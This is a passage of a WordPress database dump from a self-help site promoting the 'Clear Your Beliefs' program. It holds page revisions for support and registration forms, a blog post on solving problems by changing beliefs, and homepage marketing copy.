pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form></div>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-revision-v1', '', '', '2015-03-12 22:30:20', '2015-03-13 03:30:20', '', 1132, 'http://clearyourbeliefs.com/1132-revision-v1', 0, 'revision', '', 0),
(2100, 2, '2016-02-01 03:11:22', '2016-02-01 08:11:22', '<h1>Get Support During Your CLEAR YOUR BELIEFS Course</h1>\n&nbsp;\n\n<strong>We are happy to provide you with support while you''re going through the Clear Your Beliefs program.</strong>\n\nWe offer <strong>one free 15-minute consultation</strong>, which you can use to get help with any issue or question, whether technical or personal.\n\nSchedule your time below. At the time of your appointment, a <em>Clear Your Beliefs Coach</em> will contact you by phone or Skype. Be sure to provide your Skype address if you are outside the U.S.\n\nBe available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\n\nYour coach will let you know when you''ve used the free 15 minutes. You will then be offered the option of continuing your coaching session for a full hour (another 45 minutes) for only $100, which is half of the prevailing standard CYB Coaching rate. If you choose to continue the call, you can pay the fee via Paypal. Your Coach will give you instructions.\n\nSchedule your Free 15-minute Consultation by choosing a date and time below. Then press the “Continue” button.\n\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\n\n<strong>We look forward to serving you!</strong>\n\n<iframe src="https://www.timetrade.com/book/DDTDP" width="760" height="683" frameborder="0"></iframe>\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\n\n\n<p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/702614ce4d4a54ec6c16fe26b8051013"></script></p>', 'Support', '', 'inherit', 'closed', 'open', '', '2094-autosave-v1', '', '', '2016-02-01 03:11:22', '2016-02-01 08:11:22', '', 2094, 'http://clearyourbeliefs.com/2094-autosave-v1', 0, 'revision', '', 0),
(2101, 2, '2015-03-12 23:14:34', '2015-03-13 04:14:34', 'We are happy to provide you with support while you''re going through the Clear Your Beliefs program. \r\n\r\nWe offer one free 15-minute consultation with one of our certified Clear Your Beliefs Coaches, who can help you with any question, whether technical or personal.\r\n\r\nSchedule your time below. At the time you specify, your coach will contact you by phone or skype (be sure to provide your skype address, especially if you are outside the U.S.). Be available at the time you scheduled. If you do not answer the call at that time, you will forfeit your appointment.\r\n\r\nYour coach will let you know when you''ve used the free 15 minutes. You’ll then be offered the option of continuing the coaching session for a full hour – for another 45 minutes, for only $100, which is one-half our usual rate.  If you choose to continue the call, you can pay the fee instantly via Paypal.  Your Coach will give you instructions.\r\n\r\nSchedule your Free 15-minute Consultation by choosing a date and time below, then press “Continue.”\r\n\r\nIf you prefer we respond to your questions by email, fill out the contact form below as fully as possible. We will do our best to respond within a few days. (Scheduled phone appointments receive our priority attention.)\r\n\r\n We look forward to serving you!\r\n\r\n<h1>   </h1>\r\n<h1>Lion Goodman''s Calendar</h1>\r\n<p><iframe src="https://www.timetrade.com/book/DDTDP" frameborder="0" height="683" width="760"></iframe><br> <br></p>\r\n\r\n<h1>Stan Karp''s Calendar</h1>\r\n<p><iframe src="https://www.timetrade.com/book/NCB9Q" frameborder="0" height="683" width="760"></iframe></p>\r\n\r\n<p style="text-align: justify; font-size: 18px; margin-top: 15px;">If you prefer we contact you by email, please fill out this form as fully as possible. We will do our best to respond within a few days (scheduled phone appointments (using the link above) receive our priority attention.</p>\r\n\r\n[Contact Form HERE]\r\n\r\nFirst Name *\r\n\r\nLast Name *\r\n\r\nEmail *\r\n\r\nPhone\r\n\r\nSkype name\r\n\r\nCity\r\n\r\nState\r\n\r\nCountry\r\n\r\nI prefer to be contacted\r\nby email\r\nby skype\r\nby phone\r\n\r\nPreferred time of contact\r\nmorning\r\nafternoon\r\nevening\r\n\r\nI would like support for: *\r\n', 'Support', '', 'inherit', 'closed', 'open', '', '2094-revision-v1', '', '', '2015-03-12 23:14:34', '2015-03-13 04:14:34', '', 2094, 'http://clearyourbeliefs.com/2094-revision-v1', 0, 'revision', '', 0),
(2107, 2, '2015-03-13 02:37:42', '2015-03-13 07:37:42', '', 'demopic', '', 'inherit', 'closed', 'open', '', 'demopic', '', '', '2015-03-13 02:37:42', '2015-03-13 07:37:42', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2015/03/demopic.png', 0, 'attachment', 'image/png', 0),
(2110, 2, '2015-03-13 02:42:09', '2015-03-13 07:42:09', '', '211x211', '', 'inherit', 'closed', 'open', '', '211x211', '', '', '2015-03-13 02:42:09', '2015-03-13 07:42:09', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/05/211x211.gif', 0, 'attachment', 'image/gif', 0),
(2122, 2, '2015-03-13 13:05:36', '2015-03-13 18:05:36', 'You have a unique set of problems.  And so do I.   \r\n\r\nProblems come with being human. You have a body, which is less than perfect. You have an ego with constantly changing needs and reactions. Imperfect people fill your life, and each of them has their own needs, opinions, and problems of their own.    \r\n \r\nAre your problems a problem for you?  Or are they just "life"?\r\n \r\nMost people tackle their problems from the end-point, the condition they want: "This is what I want, and I don''t have it. So I''ll figure out how to get it." \r\n \r\nThis leads to many well-worn strategies: persuasion, manipulation, control over others, and increasing one''s personal wealth and power.\r\n \r\nWhen our problems involve other people, we try to control their behavior or change them in some way. This is usually frustrating.  We pay them to do what we want them to do. We entice them with rewards. We threaten with consequences, or punishment. We even play nice and try cooperation. The game is the same regardless. You''re trying to change them so you get what you want.  \r\n \r\nYou''ve been on the receiving end of this will-bending process. When you were a child, your parents (and teachers, and priests...) tried every trick in the book to get you to behave the way they wanted you to behave, and believe what they wanted you to believe. \r\n \r\nThere''s another approach to solving problems that works better. It''s easier, and it causes less harm. Look within, to the CAUSE of the problem itself. \r\n \r\nWhen you begin within, you''ve got a better chance at solving the real problem.\r\n \r\nMost of us try the same tactics on ourselves that didn''t work well on others. We try to persuade, dominate, or control ourselves. We push ourselves with inner discipline. We talk to ourselves nicely, then harshly. We offer ourselves rewards and punishment to bend our inner will toward our outer goals.   \r\n \r\nThis works about as well as when we try to control or manipulate others.  In other words – not very well.\r\n \r\nSo what''s the solution?  Where does real change begin? \r\n \r\nIt begins with your beliefs.  \r\n \r\nOur stance is that your beliefs create your experience.  \r\n \r\nIf this proposition is true, you should be able to directly alter your experience by changing your beliefs.  You should be able to alter or solve a problem by changing your beliefs.  \r\n \r\nDoes it work?  Yes.  Surprisingly well!\r\n \r\nYour problem might be personal and internal, such as being overweight, self-critical, or lacking motivation.\r\n \r\nYour problem might be external, and involve other people, such as relationship issues, difficulties at work, and organizational problems.\r\n \r\nWhen you examine the beliefs you have about the problem, and your beliefs about yourself with regard to the problem, you open up your viewpoint about the issue, and gain new perspective – both of which are incredibly valuable.\r\n \r\nBegin by asking these questions:\r\nWhat do I believe about this problem?\r\nWhat do I believe about my ability to solve it?\r\nWhat do I believe about the other person, or persons, involved?\r\nWhat do I believe about the circumstances and environment the problem is part of? \r\nWhat would happen if I changed some of those beliefs? \r\nThen, examine your list and look for beliefs that, if changed, would create a significant breakthrough.  \r\n \r\nArchimedes said: "Give me a place to stand, and a lever of sufficient length, and I can move the world."  Belief-change is the lever that can move your world.\r\n  \r\nWhen you change your beliefs, your circumstances won''t necessarily change (although quite often they do).  However, you will be in the best position possible to deal with your circumstances.  This is that "place to stand" – your standpoint, or perspective on the situation.\r\n \r\nFor example, when you change the belief, "I can''t do anything about that," to "I can do something about that," you radically shift the possibilities that are open to you.\r\n \r\nIn many cases, when you change your beliefs at the core, the problem will lighten up or disappear completely. Solutions appear that weren''t visible before.\r\n \r\nThis is the great benefit of clearing your beliefs.  \r\n \r\nIf you''d like to learn more about this methodology for changing your beliefs at the core of your psyche, visit ClearYourBeliefs.com.  \r\n \r\nAnd if you''re a leader, a coach, or an agent of change, learn how to use this potent methodology to help your team or your clients solve their problems more quickly and efficiently.  Information about the training, which begins April 14th, is available at ClearBeliefs.com. \r\n \r\nMy wish for you is that you have better, bigger problems to solve in your life!  ', 'Solve Your Problem from the Inside', '', 'inherit', 'closed', 'open', '', '2121-revision-v1', '', '', '2015-03-13 13:05:36', '2015-03-13 18:05:36', '', 2121, 'http://clearyourbeliefs.com/blog-posts/2121-revision-v1/', 0, 'revision', '', 0),
(2119, 2, '2015-03-13 12:08:10', '2015-03-13 17:08:10', '', 'Blog', '', 'publish', 'closed', 'open', '', 'blog', '', '', '2015-03-13 12:08:10', '2015-03-13 17:08:10', '', 0, 'http://clearyourbeliefs.com/?page_id=2119', 0, 'page', '', 0),
(2120, 2, '2015-03-13 12:08:10', '2015-03-13 17:08:10', '', 'Blog', '', 'inherit', 'closed', 'open', '', '2119-revision-v1', '', '', '2015-03-13 12:08:10', '2015-03-13 17:08:10', '', 2119, 'http://clearyourbeliefs.com/blog/2119-revision-v1/', 0, 'revision', '', 0),
(2121, 2, '2015-03-13 13:05:36', '2015-03-13 18:05:36', '<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1.jpg"><img class="alignleft size-medium wp-image-302" src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="300" height="282" /></a>You have a unique set of problems. And so do I.</p>\r\n<p>Problems come with being human. You have a body, which is less than perfect. You have an ego with constantly changing needs and reactions. Imperfect people fill your life, and each of them has their own needs, opinions, and problems of their own.</p>\r\n<p>Are your problems a problem for you? Or are they just "life"?</p>\r\n<p><!--more--></p>\r\n<p>Most people tackle their problems from the end-point, the condition they want: "This is what I want, and I don''t have it. So I''ll figure out how to get it."</p>\r\n<p>This leads to many well-worn strategies: persuasion, manipulation, control over others, and increasing one''s personal wealth and power.</p>\r\n<p>When our problems involve other people, we try to control their behavior or change them in some way. This is usually frustrating. We pay them to do what we want them to do. We entice them with rewards. We threaten with consequences, or punishment. We even play nice and try cooperation. The game is the same regardless. You''re trying to change them so you get what you want.</p>\r\n<p>You''ve been on the receiving end of this will-bending process. When you were a child, your parents (and teachers, and priests...) tried every trick in the book to get you to behave the way they wanted you to behave, and believe what they wanted you to believe.</p>\r\n<p>There''s another approach to solving problems that works better. It''s easier, and it causes less harm. Look within, to the CAUSE of the problem itself.</p>\r\n<p>When you begin within, you''ve got a better chance at solving the real problem.</p>\r\n<p>Most of us try the same tactics on ourselves that didn''t work well on others. We try to persuade, dominate, or control ourselves. We push ourselves with inner discipline. We talk to ourselves nicely, then harshly. We offer ourselves rewards and punishment to bend our inner will toward our outer goals.</p>\r\n<p>This works about as well as when we try to control or manipulate others. In other words – not very well.</p>\r\n<p>So what''s the solution? Where does real change begin?</p>\r\n<p>It begins with your beliefs.</p>\r\n<p>Our stance is that your beliefs create your experience.</p>\r\n<p>If this proposition is true, you should be able to directly alter your experience by changing your beliefs. You should be able to alter or solve a problem by changing your beliefs.</p>\r\n<p>Does it work? Yes. Surprisingly well!</p>\r\n<p>Your problem might be personal and internal, such as being overweight, self-critical, or lacking motivation.</p>\r\n<p>Your problem might be external, and involve other people, such as relationship issues, difficulties at work, and organizational problems.</p>\r\n<p>When you examine the beliefs you have about the problem, and your beliefs about yourself with regard to the problem, you open up your viewpoint about the issue, and gain new perspective – both of which are incredibly valuable.</p>\r\n<p>Begin by asking these questions:<br />\r\nWhat do I believe about this problem?<br />\r\nWhat do I believe about my ability to solve it?<br />\r\nWhat do I believe about the other person, or persons, involved?<br />\r\nWhat do I believe about the circumstances and environment the problem is part of?<br />\r\nWhat would happen if I changed some of those beliefs?<br />\r\nThen, examine your list and look for beliefs that, if changed, would create a significant breakthrough.</p>\r\n<p>Archimedes said: "Give me a place to stand, and a lever of sufficient length, and I can move the world." Belief-change is the lever that can move your world.</p>\r\n<p>When you change your beliefs, your circumstances won''t necessarily change (although quite often they do). However, you will be in the best position possible to deal with your circumstances. This is that "place to stand" – your standpoint, or perspective on the situation.</p>\r\n<p>For example, when you change the belief, "I can''t do anything about that," to "I can do something about that," you radically shift the possibilities that are open to you.</p>\r\n<p>In many cases, when you change your beliefs at the core, the problem will lighten up or disappear completely. Solutions appear that weren''t visible before.</p>\r\n<p>This is the great benefit of clearing your beliefs.</p>\r\n<p>If you''d like to learn more about this methodology for changing your beliefs at the core of your psyche, visit ClearYourBeliefs.com.</p>\r\n<p>And if you''re a leader, a coach, or an agent of change, learn how to use this potent methodology to help your team or your clients solve their problems more quickly and efficiently. Information about the training, which begins April 14th, is available at ClearBeliefs.com.</p>\r\n<p>My wish for you is that you have better, bigger problems to solve in your life!</p>\r\n', 'Solve Your Problem from the Inside', '', 'publish', 'closed', 'open', '', 'solve-your-problem-from-the-inside', '', '', '2015-03-17 21:31:54', '2015-03-18 02:31:54', '', 0, 'http://clearyourbeliefs.com/?p=2121', 0, 'post', '', 0),
(2134, 2, '2015-03-13 14:33:48', '2015-03-13 19:33:48', ' ', '', '', 'publish', 'closed', 'open', '', '2134', '', '', '2015-03-13 14:33:48', '2015-03-13 19:33:48', '', 0, 'http://clearyourbeliefs.com/?p=2134', 1, 'nav_menu_item', '', 0),
(2124, 2, '2015-03-13 14:03:20', '2015-03-13 19:03:20', '', 'Free eBook', 'Free eBook', 'publish', 'closed', 'open', '', 'free-ebook', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=2124', 2, 'nav_menu_item', '', 0),
(2125, 2, '2015-03-13 14:03:20', '2015-03-13 19:03:20', '', 'HOME', 'Clear your Beliefs HOME', 'publish', 'closed', 'open', '', 'home', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=2125', 1, 'nav_menu_item', '', 0),
(2127, 2, '2015-03-13 14:05:46', '2015-03-13 19:05:46', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1.jpg"><img class="alignleft size-medium wp-image-302" src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="300" height="282" /></a>You have a unique set of problems. And so do I.\r\n\r\nProblems come with being human. You have a body, which is less than perfect. You have an ego with constantly changing needs and reactions. Imperfect people fill your life, and each of them has their own needs, opinions, and problems of their own.\r\n\r\nAre your problems a problem for you? Or are they just "life"?\r\n\r\n<!--more-->\r\n\r\nMost people tackle their problems from the end-point, the condition they want: "This is what I want, and I don''t have it. So I''ll figure out how to get it."\r\n\r\nThis leads to many well-worn strategies: persuasion, manipulation, control over others, and increasing one''s personal wealth and power.\r\n\r\nWhen our problems involve other people, we try to control their behavior or change them in some way. This is usually frustrating. We pay them to do what we want them to do. We entice them with rewards. We threaten with consequences, or punishment. We even play nice and try cooperation. The game is the same regardless. You''re trying to change them so you get what you want.\r\n\r\nYou''ve been on the receiving end of this will-bending process. When you were a child, your parents (and teachers, and priests...) tried every trick in the book to get you to behave the way they wanted you to behave, and believe what they wanted you to believe.\r\n\r\nThere''s another approach to solving problems that works better. It''s easier, and it causes less harm. Look within, to the CAUSE of the problem itself.\r\n\r\nWhen you begin within, you''ve got a better chance at solving the real problem.\r\n\r\nMost of us try the same tactics on ourselves that didn''t work well on others. We try to persuade, dominate, or control ourselves. We push ourselves with inner discipline. We talk to ourselves nicely, then harshly. We offer ourselves rewards and punishment to bend our inner will toward our outer goals.\r\n\r\nThis works about as well as when we try to control or manipulate others. In other words – not very well.\r\n\r\nSo what''s the solution? Where does real change begin?\r\n\r\nIt begins with your beliefs.\r\n\r\nOur stance is that your beliefs create your experience.\r\n\r\nIf this proposition is true, you should be able to directly alter your experience by changing your beliefs. You should be able to alter or solve a problem by changing your beliefs.\r\n\r\nDoes it work? Yes. Surprisingly well!\r\n\r\nYour problem might be personal and internal, such as being overweight, self-critical, or lacking motivation.\r\n\r\nYour problem might be external, and involve other people, such as relationship issues, difficulties at work, and organizational problems.\r\n\r\nWhen you examine the beliefs you have about the problem, and your beliefs about yourself with regard to the problem, you open up your viewpoint about the issue, and gain new perspective – both of which are incredibly valuable.\r\n\r\nBegin by asking these questions:\r\nWhat do I believe about this problem?\r\nWhat do I believe about my ability to solve it?\r\nWhat do I believe about the other person, or persons, involved?\r\nWhat do I believe about the circumstances and environment the problem is part of?\r\nWhat would happen if I changed some of those beliefs?\r\nThen, examine your list and look for beliefs that, if changed, would create a significant breakthrough.\r\n\r\nArchimedes said: "Give me a place to stand, and a lever of sufficient length, and I can move the world." Belief-change is the lever that can move your world.\r\n\r\nWhen you change your beliefs, your circumstances won''t necessarily change (although quite often they do). However, you will be in the best position possible to deal with your circumstances. This is that "place to stand" – your standpoint, or perspective on the situation.\r\n\r\nFor example, when you change the belief, "I can''t do anything about that," to "I can do something about that," you radically shift the possibilities that are open to you.\r\n\r\nIn many cases, when you change your beliefs at the core, the problem will lighten up or disappear completely. Solutions appear that weren''t visible before.\r\n\r\nThis is the great benefit of clearing your beliefs.\r\n\r\nIf you''d like to learn more about this methodology for changing your beliefs at the core of your psyche, visit ClearYourBeliefs.com.\r\n\r\nAnd if you''re a leader, a coach, or an agent of change, learn how to use this potent methodology to help your team or your clients solve their problems more quickly and efficiently. Information about the training, which begins April 14th, is available at ClearBeliefs.com.\r\n\r\nMy wish for you is that you have better, bigger problems to solve in your life!', 'Solve Your Problem from the Inside', '', 'inherit', 'closed', 'open', '', '2121-revision-v1', '', '', '2015-03-13 14:05:46', '2015-03-13 19:05:46', '', 2121, 'http://clearyourbeliefs.com/blog-posts/2121-revision-v1/', 0, 'revision', '', 0),
(2126, 2, '2015-03-13 14:05:31', '2015-03-13 19:05:31', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1.jpg"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="300" height="282" class="alignleft size-medium wp-image-302" /></a>You have a unique set of problems.  And so do I.   \r\n\r\nProblems come with being human. You have a body, which is less than perfect. You have an ego with constantly changing needs and reactions. Imperfect people fill your life, and each of them has their own needs, opinions, and problems of their own.    \r\n \r\nAre your problems a problem for you?  Or are they just "life"?\r\n\r\n\r\n \r\nMost people tackle their problems from the end-point, the condition they want: "This is what I want, and I don''t have it. So I''ll figure out how to get it." \r\n \r\nThis leads to many well-worn strategies: persuasion, manipulation, control over others, and increasing one''s personal wealth and power.\r\n \r\nWhen our problems involve other people, we try to control their behavior or change them in some way. This is usually frustrating.  We pay them to do what we want them to do. We entice them with rewards. We threaten with consequences, or punishment. We even play nice and try cooperation. The game is the same regardless. You''re trying to change them so you get what you want.  \r\n \r\nYou''ve been on the receiving end of this will-bending process. When you were a child, your parents (and teachers, and priests...) tried every trick in the book to get you to behave the way they wanted you to behave, and believe what they wanted you to believe. \r\n \r\nThere''s another approach to solving problems that works better. It''s easier, and it causes less harm. Look within, to the CAUSE of the problem itself. \r\n \r\nWhen you begin within, you''ve got a better chance at solving the real problem.\r\n \r\nMost of us try the same tactics on ourselves that didn''t work well on others. We try to persuade, dominate, or control ourselves. We push ourselves with inner discipline. We talk to ourselves nicely, then harshly. We offer ourselves rewards and punishment to bend our inner will toward our outer goals.   \r\n \r\nThis works about as well as when we try to control or manipulate others.  In other words – not very well.\r\n \r\nSo what''s the solution?  Where does real change begin? \r\n \r\nIt begins with your beliefs.  \r\n \r\nOur stance is that your beliefs create your experience.  \r\n \r\nIf this proposition is true, you should be able to directly alter your experience by changing your beliefs.  You should be able to alter or solve a problem by changing your beliefs.  \r\n \r\nDoes it work?  Yes.  Surprisingly well!\r\n \r\nYour problem might be personal and internal, such as being overweight, self-critical, or lacking motivation.\r\n \r\nYour problem might be external, and involve other people, such as relationship issues, difficulties at work, and organizational problems.\r\n \r\nWhen you examine the beliefs you have about the problem, and your beliefs about yourself with regard to the problem, you open up your viewpoint about the issue, and gain new perspective – both of which are incredibly valuable.\r\n \r\nBegin by asking these questions:\r\nWhat do I believe about this problem?\r\nWhat do I believe about my ability to solve it?\r\nWhat do I believe about the other person, or persons, involved?\r\nWhat do I believe about the circumstances and environment the problem is part of? \r\nWhat would happen if I changed some of those beliefs? \r\nThen, examine your list and look for beliefs that, if changed, would create a significant breakthrough.  \r\n \r\nArchimedes said: "Give me a place to stand, and a lever of sufficient length, and I can move the world."  Belief-change is the lever that can move your world.\r\n  \r\nWhen you change your beliefs, your circumstances won''t necessarily change (although quite often they do).  However, you will be in the best position possible to deal with your circumstances.  This is that "place to stand" – your standpoint, or perspective on the situation.\r\n \r\nFor example, when you change the belief, "I can''t do anything about that," to "I can do something about that," you radically shift the possibilities that are open to you.\r\n \r\nIn many cases, when you change your beliefs at the core, the problem will lighten up or disappear completely. Solutions appear that weren''t visible before.\r\n \r\nThis is the great benefit of clearing your beliefs.  \r\n \r\nIf you''d like to learn more about this methodology for changing your beliefs at the core of your psyche, visit ClearYourBeliefs.com.  \r\n \r\nAnd if you''re a leader, a coach, or an agent of change, learn how to use this potent methodology to help your team or your clients solve their problems more quickly and efficiently.  Information about the training, which begins April 14th, is available at ClearBeliefs.com. \r\n \r\nMy wish for you is that you have better, bigger problems to solve in your life!  ', 'Solve Your Problem from the Inside', '', 'inherit', 'closed', 'open', '', '2121-revision-v1', '', '', '2015-03-13 14:05:31', '2015-03-13 19:05:31', '', 2121, 'http://clearyourbeliefs.com/blog-posts/2121-revision-v1/', 0, 'revision', '', 0),
(2158, 2, '2015-04-16 12:34:51', '2015-04-16 17:34:51', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nThe App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Only $4.99 for Rapid Release Technology</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://www.clearbeliefs.com" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'open', 'open', '', '1450-revision-v1', '', '', '2015-04-16 12:34:51', '2015-04-16 17:34:51', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2159, 2, '2015-04-16 12:36:02', '2015-04-16 17:36:02', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nThe App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Only $4.99!</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and 